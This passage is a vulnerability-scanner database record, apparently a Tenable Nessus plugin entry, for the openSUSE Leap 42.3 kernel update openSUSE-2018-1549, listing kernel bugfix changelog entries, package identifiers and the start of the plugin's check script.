wakeup (bnc#1012382).\n\n - fuse: fix leaked notify reply (bnc#1012382).\n\n - fuse: set FR_SENT while locked (bnc#1012382).\n\n - genirq: Fix race on spurious interrupt detection (bnc#1012382).\n\n - gfs2: Put bitmap buffers in put_super (bnc#1012382).\n\n - gfs2_meta: ->mount() can get NULL dev_name (bnc#1012382).\n\n - gpio: msic: fix error return code in platform_msic_gpio_probe() (bnc#1012382).\n\n - gpu: host1x: fix error return code in host1x_probe() (bnc#1012382).\n\n - hfs: prevent btree data loss on root split (bnc#1012382).\n\n - hfsplus: prevent btree data loss on root split (bnc#1012382).\n\n - hugetlbfs: dirty pages as they are added to pagecache (bnc#1012382).\n\n - hugetlbfs: fix kernel BUG at fs/hugetlbfs/inode.c:444! (bnc#1012382).\n\n - hwmon: (ibmpowernv) Remove bogus __init annotations (bnc#1012382).\n\n - hwmon: (pmbus) Fix page count auto-detection (bnc#1012382).\n\n - ibmvnic: Fix RX queue buffer cleanup (bsc#1115440, bsc#1115433).\n\n - ibmvnic: fix accelerated VLAN handling ().\n\n - ibmvnic: fix index in release_rx_pools (bsc#1115440).\n\n - ibmvnic: remove ndo_poll_controller ().\n\n - igb: Remove superfluous reset to PHY and page 0 selection (bnc#1012382).\n\n - iio: adc: at91: fix acking DRDY irq on simple conversions (bnc#1012382).\n\n - iio: adc: at91: fix wrong channel number in triggered buffer mode (bnc#1012382).\n\n - ima: fix showing large 'violations' or 'runtime_measurements_count' (bnc#1012382).\n\n - iommu/arm-smmu: Ensure that page-table updates are visible before TLBI (bsc#1106237).\n\n - iommu/ipmmu-vmsa: Fix crash on early domain free (bsc#1106105).\n\n - iommu/vt-d: Fix NULL pointer dereference in prq_event_thread() (bsc#1106105).\n\n - iommu/vt-d: Use memunmap to free memremap (bsc#1106105).\n\n - ip_tunnel: do not force DF when MTU is locked (bnc#1012382).\n\n - ipmi: Fix timer race with module unload (bnc#1012382).\n\n - ipv6/ndisc: Preserve IPv6 control buffer if protocol error handlers are called (bnc#1012382).\n\n - ipv6: Fix PMTU updates for UDP/raw sockets in presence of VRF (bnc#1012382).\n\n - ipv6: mcast: fix a use-after-free in inet6_mc_check (bnc#1012382).\n\n - ipv6: orphan skbs in reassembly unit (bnc#1012382).\n\n - ipv6: set rt6i_protocol properly in the route when it is installed (bsc#1114190).\n\n - ipv6: suppress sparse warnings in IP6_ECN_set_ce() (bnc#1012382).\n\n - jbd2: fix use after free in jbd2_log_do_checkpoint() (bnc#1012382).\n\n - jffs2: free jffs2_sb_info through jffs2_kill_sb() (bnc#1012382).\n\n - kABI: protect struct azx (kabi).\n\n - kABI: protect struct cfs_bandwidth (kabi).\n\n - kABI: protect struct esp (kabi).\n\n - kABI: protect struct fuse_io_priv (kabi).\n\n - kabi: revert sig change on pnfs_read_resend_pnfs (git-fixes).\n\n - kbuild, LLVMLinux: Add -Werror to cc-option to support clang (bnc#1012382).\n\n - kbuild: Add __cc-option macro (bnc#1012382).\n\n - kbuild: Add better clang cross build support (bnc#1012382).\n\n - kbuild: Add support to generate LLVM assembly files (bnc#1012382).\n\n - kbuild: Consolidate header generation from ASM offset information (bnc#1012382).\n\n - kbuild: Set KBUILD_CFLAGS before incl. arch Makefile (bnc#1012382).\n\n - kbuild: allow to use GCC toolchain not in Clang search path (bnc#1012382).\n\n - kbuild: clang: Disable 'address-of-packed-member' warning (bnc#1012382).\n\n - kbuild: clang: add -no-integrated-as to KBUILD_[AC]FLAGS (bnc#1012382).\n\n - kbuild: clang: disable unused variable warnings only when constant (bnc#1012382).\n\n - kbuild: clang: fix build failures with sparse check (bnc#1012382).\n\n - kbuild: clang: remove crufty HOSTCFLAGS (bnc#1012382).\n\n - kbuild: consolidate redundant sed script ASM offset generation (bnc#1012382).\n\n - kbuild: drop -Wno-unknown-warning-option from clang options (bnc#1012382).\n\n - kbuild: fix asm-offset generation to work with clang (bnc#1012382).\n\n - kbuild: fix kernel/bounds.c 'W=1' warning (bnc#1012382).\n\n - kbuild: fix linker feature test macros when cross compiling with Clang (bnc#1012382).\n\n - kbuild: move cc-option and cc-disable-warning after incl. arch Makefile (bnc#1012382).\n\n - kbuild: set no-integrated-as before incl. arch Makefile (bnc#1012382).\n\n - kbuild: use -Oz instead of -Os when using clang (bnc#1012382).\n\n - kernel-source.spec: Align source numbering.\n\n - kgdboc: Passing ekgdboc to command line causes panic (bnc#1012382).\n\n - kprobes: Return error if we fail to reuse kprobe instead of BUG_ON() (bnc#1012382).\n\n - lan78xx: Check for supported Wake-on-LAN modes (bnc#1012382).\n\n - lib/raid6: Fix arm64 test build (bnc#1012382).\n\n - libceph: bump CEPH_MSG_MAX_DATA_LEN (bsc#1114839).\n\n - libfc: sync strings with upstream versions (bsc#1114763).\n\n - libnvdimm: Hold reference on parent while scheduling async init (bnc#1012382).\n\n - lockd: fix access beyond unterminated strings in prints (bnc#1012382).\n\n - locking/lockdep: Fix debug_locks off performance problem (bnc#1012382).\n\n - mac80211: Always report TX status (bnc#1012382).\n\n - mac80211_hwsim: do not omit multicast announce of first added radio (bnc#1012382).\n\n - mach64: fix display corruption on big endian machines (bnc#1012382).\n\n - mach64: fix image corruption due to reading accelerator registers (bnc#1012382).\n\n - media: em28xx: fix input name for Terratec AV 350 (bnc#1012382).\n\n - media: em28xx: make v4l2-compliance happier by starting sequence on zero (bnc#1012382).\n\n - media: em28xx: use a default format if TRY_FMT fails (bnc#1012382).\n\n - media: pci: cx23885: handle adding to list failure (bnc#1012382).\n\n - media: tvp5150: fix width alignment during set_selection() (bnc#1012382).\n\n - media: v4l: event: Add subscription to list before calling 'add' operation (bnc#1012382).\n\n - misc: atmel-ssc: Fix section annotation on atmel_ssc_get_driver_data (bnc#1012382).\n\n - mm, elf: handle vm_brk error (bnc#1012382).\n\n - mm: do not bug_on on incorrect length in __mm_populate() (bnc#1012382).\n\n - mm: migration: fix migration of huge PMD shared pages (bnc#1012382).\n\n - mm: refuse wrapped vm_brk requests (bnc#1012382).\n\n - mm: thp: relax __GFP_THISNODE for MADV_HUGEPAGE mappings (bnc#1012382).\n\n - mmc: sdhci-pci-o2micro: Add quirk for O2 Micro dev 0x8620 rev 0x01 (bnc#1012382).\n\n - modules: mark __inittest/__exittest as __maybe_unused (bnc#1012382).\n\n - mount: Do not allow copying MNT_UNBINDABLE|MNT_LOCKED mounts (bnc#1012382).\n\n - mount: Prevent MNT_DETACH from disconnecting locked mounts (bnc#1012382).\n\n - mount: Retest MNT_LOCKED in do_umount (bnc#1012382).\n\n - mtd: docg3: do not set conflicting BCH_CONST_PARAMS option (bnc#1012382).\n\n - mtd: spi-nor: Add support for is25wp series chips (bnc#1012382).\n\n - net-gro: reset skb->pkt_type in napi_reuse_skb() (bnc#1012382).\n\n - net/af_iucv: drop inbound packets with invalid flags (bnc#1114475, LTC#172679).\n\n - net/af_iucv: fix skb handling on HiperTransport xmit error (bnc#1114475, LTC#172679).\n\n - net/ibmnvic: Fix deadlock problem in reset ().\n\n - net/ipv4: defensive cipso option parsing (bnc#1012382).\n\n - net/ipv6: Fix index counter for unicast addresses in in6_dump_addrs (bnc#1012382).\n\n - net: bridge: remove ipv6 zero address check in mcast queries (bnc#1012382).\n\n - net: cxgb3_main: fix a missing-check bug (bnc#1012382).\n\n - net: drop skb on failure in ip_check_defrag() (bnc#1012382).\n\n - net: drop write-only stack variable (bnc#1012382).\n\n - net: ena: Fix Kconfig dependency on X86 (bsc#1117562).\n\n - net: ena: add functions for handling Low Latency Queues in ena_com (bsc#1117562).\n\n - net: ena: add functions for handling Low Latency Queues in ena_netdev (bsc#1117562).\n\n - net: ena: change rx copybreak default to reduce kernel memory pressure (bsc#1117562).\n\n - net: ena: complete host info to match latest ENA spec (bsc#1117562).\n\n - net: ena: enable Low Latency Queues (bsc#1117562).\n\n - net: ena: explicit casting and initialization, and clearer error handling (bsc#1117562).\n\n - net: ena: fix NULL dereference due to untimely napi initialization (bsc#1117562).\n\n - net: ena: fix auto casting to boolean (bsc#1117562).\n\n - net: ena: fix compilation error in xtensa architecture (bsc#1117562).\n\n - net: ena: fix crash during failed resume from hibernation (bsc#1117562).\n\n - net: ena: fix indentations in ena_defs for better readability (bsc#1117562).\n\n - net: ena: fix rare bug when failed restart/resume is followed by driver removal (bsc#1117562).\n\n - net: ena: fix warning in rmmod caused by double iounmap (bsc#1117562).\n\n - net: ena: introduce Low Latency Queues data structures according to ENA spec (bsc#1117562).\n\n - net: ena: limit refill Rx threshold to 256 to avoid latency issues (bsc#1117562).\n\n - net: ena: minor performance improvement (bsc#1117562).\n\n - net: ena: remove ndo_poll_controller (bsc#1117562).\n\n - net: ena: remove redundant parameter in ena_com_admin_init() (bsc#1117562).\n\n - net: ena: update driver version to 2.0.1 (bsc#1117562).\n\n - net: ena: use CSUM_CHECKED device indication to report skb's checksum status (bsc#1117562).\n\n - net: ibm: fix return type of ndo_start_xmit function ().\n\n - net: qla3xxx: Remove overflowing shift statement (bnc#1012382).\n\n - net: sched: gred: pass the right attribute to gred_change_table_def() (bnc#1012382).\n\n - net: socket: fix a missing-check bug (bnc#1012382).\n\n - net: stmmac: Fix stmmac_mdio_reset() when building stmmac as modules (bnc#1012382).\n\n - netfilter: ipset: Correct rcu_dereference() call in ip_set_put_comment() (bnc#1012382).\n\n - netfilter: ipset: actually allow allowable CIDR 0 in hash:net,port,net (bnc#1012382).\n\n - netfilter: xt_IDLETIMER: add sysfs filename checking routine (bnc#1012382).\n\n - new helper: uaccess_kernel() (bnc#1012382).\n\n - nfsd: Fix an Oops in free_session() (bnc#1012382).\n\n - ocfs2: fix a misuse a of brelse after failing ocfs2_check_dir_entry (bnc#1012382).\n\n - pNFS/flexfiles: Fix up the ff_layout_write_pagelist failure path (git-fixes).\n\n - pNFS/flexfiles: When checking for available DSes, conditionally check for MDS io (git-fixes).\n\n - pNFS: Fix a deadlock between read resends and layoutreturn (git-fixes).\n\n - parisc: Fix address in HPMC IVA (bnc#1012382).\n\n - parisc: Fix map_pages() to not overwrite existing pte entries (bnc#1012382).\n\n - pcmcia: Implement CLKRUN protocol disabling for Ricoh bridges (bnc#1012382).\n\n - perf tools: Cleanup trace-event-info 'tdata' leak (bnc#1012382).\n\n - perf tools: Disable parallelism for 'make clean' (bnc#1012382).\n\n - perf tools: Free temporary 'sys' string in read_event_files() (bnc#1012382).\n\n - perf/core: Do not leak event in the syscall error path (bnc#1012382).\n\n - perf/ring_buffer: Prevent concurent ring buffer access (bnc#1012382).\n\n - pinctrl: qcom: spmi-mpp: Fix drive strength setting (bnc#1012382).\n\n - pinctrl: qcom: spmi-mpp: Fix err handling of pmic_mpp_set_mux (bnc#1012382).\n\n - pinctrl: spmi-mpp: Fix pmic_mpp_config_get() to be compliant (bnc#1012382).\n\n - pinctrl: ssbi-gpio: Fix pm8xxx_pin_config_get() to be compliant (bnc#1012382).\n\n - platform/x86: acerhdf: Add BIOS entry for Gateway LT31 v1.3307 (bnc#1012382).\n\n - pnfs: set NFS_IOHDR_REDO in pnfs_read_resend_pnfs (git-fixes).\n\n - powerpc/boot: Ensure _zimage_start is a weak symbol (bnc#1012382).\n\n - powerpc/msi: Fix compile error on mpc83xx (bnc#1012382).\n\n - powerpc/nohash: fix undefined behaviour when testing page size support (bnc#1012382).\n\n - powerpc/powernv/pci: Work around races in PCI bridge enabling (bsc#1066223).\n\n - powerpc/powernv: Do not select the cpufreq governors (bsc#1066223).\n\n - powerpc/powernv: Fix opal_event_shutdown() called with interrupts disabled (bsc#1066223).\n\n - powerpc/pseries/mobility: Extend start/stop topology update scope (bsc#1116950, bsc#1115709).\n\n - powerpc/pseries: Fix DTL buffer registration (bsc#1066223).\n\n - powerpc/pseries: Fix how we iterate over the DTL entries (bsc#1066223).\n\n - printk: Fix panic caused by passing log_buf_len to command line (bnc#1012382).\n\n - ptp: fix Spectre v1 vulnerability (bnc#1012382).\n\n - pxa168fb: prepare the clock (bnc#1012382).\n\n - r8152: Check for supported Wake-on-LAN Modes (bnc#1012382).\n\n - r8169: fix NAPI handling under high load (bnc#1012382).\n\n - reiserfs: propagate errors from fill_with_dentries() properly (bnc#1012382).\n\n - rpcrdma: Add RPCRDMA_HDRLEN_ERR (git-fixes).\n\n - rps: flow_dissector: Fix uninitialized flow_keys used in\n __skb_get_hash possibly (bsc#1042286 bsc#1108145).\n\n - rtc: hctosys: Add missing range error reporting (bnc#1012382).\n\n - rtnetlink: Disallow FDB configuration for non-Ethernet device (bnc#1012382).\n\n - s390/mm: Fix ERROR: '__node_distance' undefined! (bnc#1012382).\n\n - s390/qeth: fix HiperSockets sniffer (bnc#1114475, LTC#172953).\n\n - s390/vdso: add missing FORCE to build targets (bnc#1012382).\n\n - s390: qeth: Fix potential array overrun in cmd/rc lookup (bnc#1114475, LTC#172682).\n\n - s390: qeth_core_mpc: Use ARRAY_SIZE instead of reimplementing its function (bnc#1114475, LTC#172682).\n\n - sc16is7xx: Fix for multi-channel stall (bnc#1012382).\n\n - sch_red: update backlog as well (bnc#1012382).\n\n - sched/cgroup: Fix cgroup entity load tracking tear-down (bnc#1012382).\n\n - sched/fair: Fix throttle_list starvation with low CFS quota (bnc#1012382).\n\n - scsi: aacraid: Fix typo in blink status (bnc#1012382).\n\n - scsi: core: Allow state transitions from OFFLINE to BLOCKED (bsc#1112246).\n\n - scsi: esp_scsi: Track residual for PIO transfers (bnc#1012382).\n\n - scsi: libfc: check fc_frame_payload_get() return value for null (bsc#1103624, bsc#1104731).\n\n - scsi: libfc: retry PRLI if we cannot analyse the payload (bsc#1104731).\n\n - scsi: lpfc: Correct soft lockup when running mds diagnostics (bnc#1012382).\n\n - scsi: megaraid_sas: fix a missing-check bug (bnc#1012382).\n\n - scsi: qla2xxx: Fix crashes in qla2x00_probe_one on probe failure (bsc#1094973).\n\n - scsi: qla2xxx: Fix incorrect port speed being set for FC adapters (bnc#1012382).\n\n - scsi: qla2xxx: Fix small memory leak in qla2x00_probe_one on probe failure (bsc#1094973).\n\n - sctp: fix race on sctp_id2asoc (bnc#1012382).\n\n - selftests: ftrace: Add synthetic event syntax testcase (bnc#1012382).\n\n - ser_gigaset: use container_of() instead of detour (bnc#1012382).\n\n - signal/GenWQE: Fix sending of SIGKILL (bnc#1012382).\n\n - signal: Always deliver the kernel's SIGKILL and SIGSTOP to a pid namespace init (bnc#1012382).\n\n - smb3: allow stats which track session and share reconnects to be reset (bnc#1012382).\n\n - smb3: do not attempt cifs operation in smb3 query info error path (bnc#1012382).\n\n - smb3: on kerberos mount if server does not specify auth type use krb5 (bnc#1012382).\n\n - smsc75xx: Check for Wake-on-LAN modes (bnc#1012382).\n\n - smsc95xx: Check for Wake-on-LAN modes (bnc#1012382).\n\n - soc/tegra: pmc: Fix child-node lookup (bnc#1012382).\n\n - sparc/pci: Refactor dev_archdata initialization into pci_init_dev_archdata (bnc#1012382).\n\n - sparc64 mm: Fix more TSB sizing issues (bnc#1012382).\n\n - sparc64: Fix exception handling in UltraSPARC-III memcpy (bnc#1012382).\n\n - sparc: Fix single-pcr perf event counter management (bnc#1012382).\n\n - spi/bcm63xx-hspi: fix error return code in bcm63xx_hsspi_probe() (bnc#1012382).\n\n - spi/bcm63xx: fix error return code in bcm63xx_spi_probe() (bnc#1012382).\n\n - spi: xlp: fix error return code in xlp_spi_probe() (bnc#1012382).\n\n - sr9800: Check for supported Wake-on-LAN modes (bnc#1012382).\n\n - sunrpc: correct the computation for page_ptr when truncating (bnc#1012382).\n\n - svcrdma: Remove unused variable in rdma_copy_tail() (git-fixes).\n\n - swim: fix cleanup on setup error (bnc#1012382).\n\n - termios, tty/tty_baudrate.c: fix buffer overrun (bnc#1012382).\n\n - tg3: Add PHY reset for 5717/5719/5720 in change ring and flow control paths (bnc#1012382).\n\n - thermal: allow spear-thermal driver to be a module (bnc#1012382).\n\n - thermal: allow u8500-thermal driver to be a module (bnc#1012382).\n\n - tpm: suppress transmit cmd error logs when TPM 1.2 is disabled/deactivated (bnc#1012382).\n\n - tracing: Skip more functions when doing stack tracing of events (bnc#1012382).\n\n - tty: check name length in tty_find_polling_driver() (bnc#1012382).\n\n - tty: serial: sprd: fix error return code in sprd_probe() (bnc#1012382).\n\n - tun: Consistently configure generic netdev params via rtnetlink (bnc#1012382).\n\n - uio: Fix an Oops on load (bnc#1012382).\n\n - uio: ensure class is registered before devices (bnc#1012382).\n\n - uio: make symbol 'uio_class_registered' static (git-fixes).\n\n - um: Avoid longjmp/setjmp symbol clashes with libpthread.a (bnc#1012382).\n\n - um: Give start_idle_thread() a return code (bnc#1012382).\n\n - usb-storage: fix bogus hardware error messages for ATA pass-thru devices (bnc#1012382).\n\n - usb: cdc-acm: add entry for Hiro (Conexant) modem (bnc#1012382).\n\n - usb: chipidea: Prevent unbalanced IRQ disable (bnc#1012382).\n\n - usb: dwc3: omap: fix error return code in dwc3_omap_probe() (bnc#1012382).\n\n - usb: ehci-omap: fix error return code in ehci_hcd_omap_probe() (bnc#1012382).\n\n - usb: gadget: storage: Fix Spectre v1 vulnerability (bnc#1012382).\n\n - usb: imx21-hcd: fix error return code in imx21_probe() (bnc#1012382).\n\n - usb: quirks: Add delay-init quirk for Corsair K70 LUX RGB (bnc#1012382).\n\n - vhost/scsi: truncate T10 PI iov_iter to prot_bytes (bnc#1012382).\n\n - vhost: Fix Spectre V1 vulnerability (bnc#1012382).\n\n - video: fbdev: pxa3xx_gcu: fix error return code in pxa3xx_gcu_probe() (bnc#1012382).\n\n - vti6: flush x-netns xfrm cache when vti interface is removed (bnc#1012382).\n\n - w1: omap-hdq: fix missing bus unregister at removal (bnc#1012382).\n\n - x86/boot: #undef memcpy() et al in string.c (bnc#1012382).\n\n - x86/build: Fix stack alignment for CLang (bnc#1012382).\n\n - x86/build: Specify stack alignment for clang (bnc#1012382).\n\n - x86/build: Use __cc-option for boot code compiler options (bnc#1012382).\n\n - x86/build: Use cc-option to validate stack alignment parameter (bnc#1012382).\n\n - x86/corruption-check: Fix panic in memory_corruption_check() when boot option without value is provided (bnc#1012382).\n\n - x86/kbuild: Use cc-option to enable\n -falign-{jumps/loops} (bnc#1012382).\n\n - x86/kconfig: Fall back to ticket spinlocks (bnc#1012382).\n\n - x86/mm/kaslr: Use the _ASM_MUL macro for multiplication to work around Clang incompatibility (bnc#1012382).\n\n - x86/mm/pat: Prevent hang during boot when mapping pages (bnc#1012382).\n\n - x86: boot: Fix EFI stub alignment (bnc#1012382).\n\n - xen-swiotlb: use actually allocated size on check physical continuous (bnc#1012382).\n\n - xen/blkfront: avoid NULL blkfront_info dereference on device removal (bsc#1111062).\n\n - xen: fix race in xen_qlock_wait() (bnc#1012382).\n\n - xen: fix xen_qlock_wait() (bnc#1012382).\n\n - xen: make xen_qlock_wait() nestable (bnc#1012382).\n\n - xfrm6: call kfree_skb when skb is toobig (bnc#1012382).\n\n - xfrm: Clear sk_dst_cache when applying per-socket policy (bnc#1012382).\n\n - xfrm: Validate address prefix lengths in the xfrm selector (bnc#1012382).\n\n - xfrm: use complete IPv6 addresses for hash (bsc#1109330).\n\n - xfrm: validate template mode (bnc#1012382).\n\n - xfs/dmapi: restore event in xfs_getbmap (bsc#1114763).\n\n - xfs: Fix error code in 'xfs_ioc_getbmap()' (git-fixes).\n\n - xprtrdma: Disable RPC/RDMA backchannel debugging messages (git-fixes).\n\n - xprtrdma: Disable pad optimization by default (git-fixes).\n\n - xprtrdma: Fix Read chunk padding (git-fixes).\n\n - xprtrdma: Fix additional uses of spin_lock_irqsave(rb_lock) (git-fixes).\n\n - xprtrdma: Fix backchannel allocation of extra rpcrdma_reps (git-fixes).\n\n - xprtrdma: Fix receive buffer accounting (git-fixes).\n\n - xprtrdma: Serialize credit accounting again (git-fixes).\n\n - xprtrdma: checking for NULL instead of IS_ERR() (git-fixes).\n\n - xprtrdma: rpcrdma_bc_receive_call() should init rq_private_buf.len (git-fixes).\n\n - xprtrdma: xprt_rdma_free() must not release backchannel reqs (git-fixes).\n\n - xtensa: add NOTES section to the linker script (bnc#1012382).\n\n - xtensa: fix boot parameters address translation (bnc#1012382).\n\n - xtensa: make sure bFLT stack is 16 byte aligned (bnc#1012382).\n\n - zram: close udev startup race condition as default groups (bnc#1012382).", "edition": 1, "reporter": "Tenable", "published": "2018-12-17T00:00:00", "title": "openSUSE Security Update : the Linux Kernel (openSUSE-2018-1549)", "type": "nessus", "enchantments": {}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": [], "modified": "2018-12-17T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:kernel-source", "p-cpe:/a:novell:opensuse:kernel-source-vanilla", "p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource", "p-cpe:/a:novell:opensuse:kernel-vanilla-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug-debuginfo", "p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo", "p-cpe:/a:novell:opensuse:kernel-default-debugsource", "p-cpe:/a:novell:opensuse:kernel-default-debuginfo", "p-cpe:/a:novell:opensuse:kernel-vanilla-base", "p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-default-devel", "p-cpe:/a:novell:opensuse:kernel-devel", "p-cpe:/a:novell:opensuse:kernel-docs-html", "p-cpe:/a:novell:opensuse:kernel-obs-qa", "p-cpe:/a:novell:opensuse:kernel-docs-pdf", "p-cpe:/a:novell:opensuse:kernel-macros", "p-cpe:/a:novell:opensuse:kernel-syms", "p-cpe:/a:novell:opensuse:kernel-vanilla", "p-cpe:/a:novell:opensuse:kernel-vanilla-devel", "p-cpe:/a:novell:opensuse:kernel-debug-base", "p-cpe:/a:novell:opensuse:kernel-debug-debugsource", "p-cpe:/a:novell:opensuse:kernel-default", "p-cpe:/a:novell:opensuse:kernel-debug-devel", "cpe:/o:novell:opensuse:42.3", "p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug", "p-cpe:/a:novell:opensuse:kernel-obs-build-debugsource", "p-cpe:/a:novell:opensuse:kernel-default-base", "p-cpe:/a:novell:opensuse:kernel-obs-build", "p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo"], "id": "OPENSUSE-2018-1549.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=119709", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-1549.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119709);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/12/17 10:33:00\");\n\n script_name(english:\"openSUSE Security Update : the Linux Kernel (openSUSE-2018-1549)\");\n script_summary(english:\"Check for the openSUSE-2018-1549 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The openSUSE Leap 42.3 kernel was updated to 4.4.165-81.1 to receive\nvarious bugfixes.\n\nThe following non-security bugs were fixed :\n\n - 9p locks: fix glock.client_id leak in do_lock\n (bnc#1012382).\n\n - 9p: clear dangling pointers in p9stat_free\n (bnc#1012382).\n\n - ACPI / LPSS: Add alternative ACPI HIDs for Cherry Trail\n DMA controllers (bnc#1012382).\n\n - ACPI / platform: Add SMB0001 HID to forbidden_id_list\n (bnc#1012382).\n\n - ALSA: ca0106: Disable IZD on SB0570 DAC to fix audio\n pops (bnc#1012382).\n\n - ALSA: hda - Add mic quirk for the Lenovo G50-30\n (17aa:3905) (bnc#1012382).\n\n - ALSA: hda: Check the non-cached stream buffers more\n explicitly (bnc#1012382).\n\n - ALSA: timer: Fix zero-division by continue of\n uninitialized instance (bnc#1012382).\n\n - ARM64: PCI: ACPI support for legacy IRQs parsing and\n consolidation with DT code (bsc#985031).\n\n - ARM: 8799/1: mm: fix pci_ioremap_io() offset check\n (bnc#1012382).\n\n - ARM: dts: apq8064: add ahci ports-implemented mask\n (bnc#1012382).\n\n - ARM: dts: imx53-qsb: disable 1.2GHz OPP (bnc#1012382).\n\n - ASoC: ak4613: Enable cache usage to fix crashes on\n resume (bnc#1012382).\n\n - ASoC: spear: fix error return code in spdif_in_probe()\n (bnc#1012382).\n\n - ASoC: wm8940: Enable cache usage to fix crashes on\n resume (bnc#1012382).\n\n - Bluetooth: SMP: fix crash in unpairing (bnc#1012382).\n\n - Bluetooth: btbcm: Add entry for BCM4335C0 UART bluetooth\n (bnc#1012382).\n\n - Btrfs: fix data corruption due to cloning of eof block\n (bnc#1012382).\n\n - Btrfs: fix NULL pointer dereference on compressed write\n path error (bnc#1012382).\n\n - Btrfs: fix wrong dentries after fsync of file that got\n its parent replaced (bnc#1012382).\n\n - CIFS: handle guest access errors to Windows shares\n (bnc#1012382).\n\n - Cramfs: fix abad comparison when wrap-arounds occur\n (bnc#1012382).\n\n - Fix kABI for 'Ensure we commit after writeback is\n complete' (bsc#1111809).\n\n - HID: hiddev: fix potential Spectre v1 (bnc#1012382).\n\n - HID: uhid: forbid UHID_CREATE under KERNEL_DS or\n elevated privileges (bnc#1012382).\n\n - IB/ucm: Fix Spectre v1 vulnerability (bnc#1012382).\n\n - Input: elan_i2c - add ACPI ID for Lenovo IdeaPad\n 330-15IGM (bnc#1012382).\n\n - KEYS: put keyring if install_session_keyring_to_cred()\n fails (bnc#1012382).\n\n - KVM: nVMX: Always reflect #NM VM-exits to L1\n (bsc#1106240).\n\n - MD: fix invalid stored role for a disk (bnc#1012382).\n\n - MD: fix invalid stored role for a disk - try2\n (bnc#1012382).\n\n - MIPS: DEC: Fix an int-handler.S CPU_DADDI_WORKAROUNDS\n regression (bnc#1012382).\n\n - MIPS: Fix FCSR Cause bit handling for correct SIGFPE\n issue (bnc#1012382).\n\n - MIPS: Handle non word sized instructions when examining\n frame (bnc#1012382).\n\n - MIPS: Loongson-3: Fix BRIDGE irq delivery problem\n (bnc#1012382).\n\n - MIPS: Loongson-3: Fix CPU UART irq delivery problem\n (bnc#1012382).\n\n - MIPS: OCTEON: fix out of bounds array access on CN68XX\n (bnc#1012382).\n\n - MIPS: kexec: Mark CPU offline before disabling local IRQ\n (bnc#1012382).\n\n - MIPS: microMIPS: Fix decoding of swsp16 instruction\n (bnc#1012382).\n\n - NFS: Ensure we commit after writeback is complete\n (bsc#1111809).\n\n - NFSv4.1: Fix the r/wsize checking (bnc#1012382).\n\n - PCI/ASPM: Do not initialize link state when\n aspm_disabled is set (bsc#1109806).\n\n - PCI/ASPM: Fix link_state teardown on device removal\n (bsc#1109806).\n\n - PCI: Add Device IDs for Intel GPU 'spurious interrupt'\n quirk (bnc#1012382).\n\n - PCI: vmd: Detach resources after stopping root bus\n (bsc#1106105).\n\n - PM / devfreq: tegra: fix error return code in\n tegra_devfreq_probe() (bnc#1012382).\n\n - Provide a temporary fix for STIBP on-by-default See\n bsc#1116497 for details.\n\n - RDMA/ucma: Fix Spectre v1 vulnerability (bnc#1012382).\n\n - Reorder a few commits in kGraft out of tree section\n\n - Revert 'Bluetooth: h5: Fix missing dependency on\n BT_HCIUART_SERDEV' (bnc#1012382).\n\n - Revert 'ceph: fix dentry leak in splice_dentry()'\n (bsc#1114839).\n\n - Revert 'media: v4l: event: Add subscription to list\n before calling 'add' operation' (kabi).\n\n - Revert 'media: videobuf2-core: do not call memop\n 'finish' when queueing' (bnc#1012382).\n\n - Revert 'x86/kconfig: Fall back to ticket spinlocks'\n (kabi).\n\n - SUNRPC: drop pointless static qualifier in\n xdr_get_next_encode_buffer() (bnc#1012382).\n\n - TC: Set DMA masks for devices (bnc#1012382).\n\n - USB: fix the usbfs flag sanitization for control\n transfers (bnc#1012382).\n\n - USB: misc: appledisplay: add 20' Apple Cinema Display\n (bnc#1012382).\n\n - USB: quirks: Add no-lpm quirk for Raydium touchscreens\n (bnc#1012382).\n\n - af_iucv: Move sockaddr length checks to before accessing\n sa_family in bind and connect handlers (bnc#1012382).\n\n - ahci: do not ignore result code of\n ahci_reset_controller() (bnc#1012382).\n\n - amd/iommu: Fix Guest Virtual APIC Log Tail Address\n Register (bsc#1106105).\n\n - arch/alpha, termios: implement BOTHER, IBSHIFT and\n termios2 (bnc#1012382).\n\n - arm64: Disable asm-operand-width warning for clang\n (bnc#1012382).\n\n - arm64: dts: stratix10: Correct System Manager register\n size (bnc#1012382).\n\n - arm64: hardcode rodata_enabled=true earlier in the\n series (bsc#1114763). \n\n - arm64: percpu: Initialize ret in the default case\n (bnc#1012382).\n\n - arm: fix mis-applied iommu identity check (bsc#1116924). \n\n - asix: Check for supported Wake-on-LAN modes\n (bnc#1012382).\n\n - ataflop: fix error handling during setup (bnc#1012382).\n\n - ath10k: schedule hardware restart if WMI command times\n out (bnc#1012382).\n\n - ax88179_178a: Check for supported Wake-on-LAN modes\n (bnc#1012382).\n\n - bcache: fix miss key refill->end in writeback\n (bnc#1012382).\n\n - binfmt_elf: fix calculations for bss padding\n (bnc#1012382).\n\n - bitops: protect variables in bit_clear_unless() macro\n (bsc#1116285).\n\n - block: fix inheriting request priority from bio\n (bsc#1116924).\n\n - block: respect virtual boundary mask in bvecs\n (bsc#1113412).\n\n - bna: ethtool: Avoid reading past end of buffer\n (bnc#1012382).\n\n - bpf: generally move prog destruction to RCU deferral\n (bnc#1012382).\n\n - bridge: do not add port to router list when receives\n query with source 0.0.0.0 (bnc#1012382).\n\n - btrfs: Handle owner mismatch gracefully when walking up\n tree (bnc#1012382).\n\n - btrfs: do not attempt to trim devices that do not\n support it (bnc#1012382).\n\n - btrfs: fix backport error in submit_stripe_bio\n (bsc#1114763).\n\n - btrfs: fix pinned underflow after transaction aborted\n (bnc#1012382).\n\n - btrfs: iterate all 